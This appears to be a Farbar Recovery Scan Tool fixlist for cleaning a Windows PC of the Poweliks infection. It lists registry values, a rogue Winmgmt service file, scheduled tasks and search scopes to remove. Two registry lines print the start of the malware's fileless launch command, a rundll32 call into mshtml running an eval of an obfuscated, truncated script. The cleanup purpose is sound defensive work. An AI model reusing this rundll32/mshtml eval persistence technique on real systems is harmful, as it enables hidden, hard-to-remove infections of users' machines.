CloseProcesses:
HKU\S-1-5-21-825610380-2903063623-3906473893-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll (Tonec Inc.)
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
S2 Winmgmt; C:\ProgramData\C6689E946A46C8F273167709064FF4F7\odj62vjlf.dot [X]
2014-10-05 12:40 - 2014-10-05 12:40 - 00002894 _____ () C:\Windows\System32\Tasks\{E2B973B0-C15F-4E07-A885-1E2A5C5AD79D}
2014-09-29 02:50 - 2014-09-29 02:50 - 00003172 _____ () C:\Windows\System32\Tasks\{0C34285A-0AA1-4481-A49F-2E4241D9B549}
CustomCLSID: HKU\S-1-5-21-825610380-2903063623-3906473893-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp: